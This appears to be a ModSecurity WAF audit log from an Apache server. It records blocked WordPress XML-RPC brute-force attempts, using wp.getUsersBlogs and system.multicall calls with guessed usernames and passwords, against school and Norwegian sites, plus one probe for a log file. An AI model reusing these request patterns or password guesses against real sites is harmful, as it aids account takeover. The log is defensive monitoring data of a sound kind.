103.236.140.4 8181 --cbdc8611-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --cbdc8611-C-- wp.getUsersBlogs admin newcastle1 --cbdc8611-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbdc8611-E-- --cbdc8611-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (85+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114472672297 4881 (- - -) Stopwatch2: 1749114472672297 4881; combined=3487, p1=425, p2=2900, p3=0, p4=0, p5=95, sr=84, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbdc8611-Z-- --efb6ea4f-A-- [05/Jun/2025:16:08:52 +0700] aEFepCrHpfaS2Cuwh8X5TQAAAE4 103.236.140.4 59664 103.236.140.4 8181 --efb6ea4f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --efb6ea4f-C-- wp.getUsersBlogs wakakur z43218765z --efb6ea4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --efb6ea4f-E-- --efb6ea4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (93+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114532835628 5215 (- - -) Stopwatch2: 1749114532835628 5215; combined=3555, p1=407, p2=2934, p3=0, p4=0, p5=125, sr=87, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --efb6ea4f-Z-- --1fedc46f-A-- [05/Jun/2025:16:09:25 +0700] aEFexVwdJdhOudw5hdzu7gAAAJE 103.236.140.4 33194 103.236.140.4 8181 --1fedc46f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 208.109.32.135 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 208.109.32.135 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --1fedc46f-C-- system.multicallmethodNamewp.getUsersBlogsparamsdnavizaq1@WSX --1fedc46f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fedc46f-E-- --1fedc46f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 208.109.32.135 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749114565979846 5396 (- - -) Stopwatch2: 1749114565979846 5396; combined=3697, p1=445, p2=3073, p3=0, p4=0, p5=108, sr=80, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fedc46f-Z-- --6453da7e-A-- [05/Jun/2025:16:09:52 +0700] aEFe4CrHpfaS2Cuwh8X6BAAAAFg 103.236.140.4 34526 103.236.140.4 8181 --6453da7e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --6453da7e-C-- wp.getUsersBlogs wakakur #changeme! --6453da7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6453da7e-E-- --6453da7e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (51+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114592317941 4422 (- - -) Stopwatch2: 1749114592317941 4422; combined=3350, p1=447, p2=2752, p3=0, p4=0, p5=89, sr=78, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6453da7e-Z-- --4f85e001-A-- [05/Jun/2025:16:10:58 +0700] aEFfIn-K7ToMdu-YSIJHGwAAAAA 103.236.140.4 37746 103.236.140.4 8181 --4f85e001-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --4f85e001-C-- wp.getUsersBlogs wakakur trustno1 --4f85e001-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f85e001-E-- --4f85e001-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (59+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114658838181 4399 (- - -) Stopwatch2: 1749114658838181 4399; combined=3202, p1=391, p2=2545, p3=0, p4=0, p5=144, sr=80, sw=122, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f85e001-Z-- --f7a57c46-A-- [05/Jun/2025:16:11:27 +0700] aEFfPyrHpfaS2Cuwh8X7AwAAAEs 103.236.140.4 39176 103.236.140.4 8181 --f7a57c46-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 50.6.205.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 50.6.205.26 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f7a57c46-C-- system.multicallmethodNamewp.getUsersBlogsparamseilderassedemo --f7a57c46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7a57c46-E-- --f7a57c46-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 50.6.205.26 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749114687593669 3885 (- - -) Stopwatch2: 1749114687593669 3885; combined=2833, p1=342, p2=2270, p3=0, p4=0, p5=122, sr=65, sw=99, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7a57c46-Z-- --60425863-A-- [05/Jun/2025:16:11:58 +0700] aEFfXlwdJdhOudw5hdzwmQAAAJM 103.236.140.4 40774 103.236.140.4 8181 --60425863-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --60425863-C-- wp.getUsersBlogs wakakur Passw0rd --60425863-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60425863-E-- --60425863-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (79+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114718299870 4463 (- - -) Stopwatch2: 1749114718299870 4463; combined=3395, p1=488, p2=2743, p3=0, p4=0, p5=96, sr=81, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60425863-Z-- --3099f528-A-- [05/Jun/2025:16:12:32 +0700] aEFfgCrHpfaS2Cuwh8X7zQAAAFQ 103.236.140.4 42462 103.236.140.4 8181 --3099f528-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 208.109.32.135 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 208.109.32.135 X-Forwarded-Proto: https Connection: close Content-Length: 494 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3099f528-C-- system.multicallmethodNamewp.getUsersBlogsparamsafaqsaleemAfaqsaleem123!@# --3099f528-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3099f528-E-- --3099f528-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 208.109.32.135 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749114752762586 5400 (- - -) Stopwatch2: 1749114752762586 5400; combined=4083, p1=470, p2=3440, p3=0, p4=0, p5=102, sr=96, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3099f528-Z-- --72c2b07e-A-- [05/Jun/2025:16:12:58 +0700] aEFfmlwdJdhOudw5hdzxUgAAAIY 103.236.140.4 43718 103.236.140.4 8181 --72c2b07e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --72c2b07e-C-- wp.getUsersBlogs wakakur Admin001 --72c2b07e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72c2b07e-E-- --72c2b07e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114778187081 5523 (- - -) Stopwatch2: 1749114778187081 5523; combined=3864, p1=461, p2=3184, p3=0, p4=0, p5=124, sr=90, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72c2b07e-Z-- --fd9dec66-A-- [05/Jun/2025:16:13:58 +0700] aEFf1uth7G2xELALzPZMPQAAAMM 103.236.140.4 46608 103.236.140.4 8181 --fd9dec66-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --fd9dec66-C-- wp.getUsersBlogs wakakur Lovely --fd9dec66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd9dec66-E-- --fd9dec66-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (60+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114838108173 4785 (- - -) Stopwatch2: 1749114838108173 4785; combined=3682, p1=454, p2=3059, p3=0, p4=0, p5=100, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd9dec66-Z-- --bcd13c07-A-- [05/Jun/2025:16:14:43 +0700] aEFgA1wdJdhOudw5hdzy-QAAAIw 103.236.140.4 48818 103.236.140.4 8181 --bcd13c07-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 50.6.205.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 50.6.205.26 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --bcd13c07-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix100 --bcd13c07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcd13c07-E-- --bcd13c07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 50.6.205.26 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749114883541813 6054 (- - -) Stopwatch2: 1749114883541813 6054; combined=4139, p1=467, p2=3479, p3=0, p4=0, p5=116, sr=73, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcd13c07-Z-- --36f24d30-A-- [05/Jun/2025:16:15:02 +0700] aEFgFlwdJdhOudw5hdzzNwAAAIk 103.236.140.4 49732 103.236.140.4 8181 --36f24d30-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --36f24d30-C-- wp.getUsersBlogs wakakur pw123 --36f24d30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36f24d30-E-- --36f24d30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (68+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114902004817 4072 (- - -) Stopwatch2: 1749114902004817 4072; combined=2916, p1=363, p2=2367, p3=0, p4=0, p5=108, sr=68, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36f24d30-Z-- --d393795f-A-- [05/Jun/2025:16:15:47 +0700] aEFgQ1wdJdhOudw5hdzzoAAAAIY 103.236.140.4 51938 103.236.140.4 8181 --d393795f-B-- GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 173534763 --d393795f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d393795f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749114947261675 2184 (- - -) Stopwatch2: 1749114947261675 2184; combined=846, p1=362, p2=445, p3=0, p4=0, p5=39, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d393795f-Z-- --13c35c74-A-- [05/Jun/2025:16:16:02 +0700] aEFgUn-K7ToMdu-YSIJKzgAAABA 103.236.140.4 52734 103.236.140.4 8181 --13c35c74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --13c35c74-C-- wp.getUsersBlogs wakakur toos --13c35c74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13c35c74-E-- --13c35c74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (90+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114962117814 4834 (- - -) Stopwatch2: 1749114962117814 4834; combined=3309, p1=439, p2=2712, p3=0, p4=0, p5=93, sr=87, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13c35c74-Z-- --5da86368-A-- [05/Jun/2025:16:16:25 +0700] aEFgaSrHpfaS2Cuwh8X-XwAAAE4 103.236.140.4 53922 103.236.140.4 8181 --5da86368-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.137 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.137 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5da86368-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehAdmin!@#123 --5da86368-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5da86368-E-- --5da86368-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.137 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749114985275909 4175 (- - -) Stopwatch2: 1749114985275909 4175; combined=2990, p1=463, p2=2395, p3=0, p4=0, p5=79, sr=119, sw=53, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5da86368-Z-- --cfbea802-A-- [05/Jun/2025:16:16:43 +0700] aEFge-th7G2xELALzPZOuQAAAMs 103.236.140.4 54864 103.236.140.4 8181 --cfbea802-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 185.18.232.22 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 185.18.232.22 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --cfbea802-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminProffus@1234 --cfbea802-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfbea802-E-- --cfbea802-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 185.18.232.22 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749115003876611 3479 (- - -) Stopwatch2: 1749115003876611 3479; combined=2585, p1=319, p2=2161, p3=0, p4=0, p5=62, sr=58, sw=43, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfbea802-Z-- 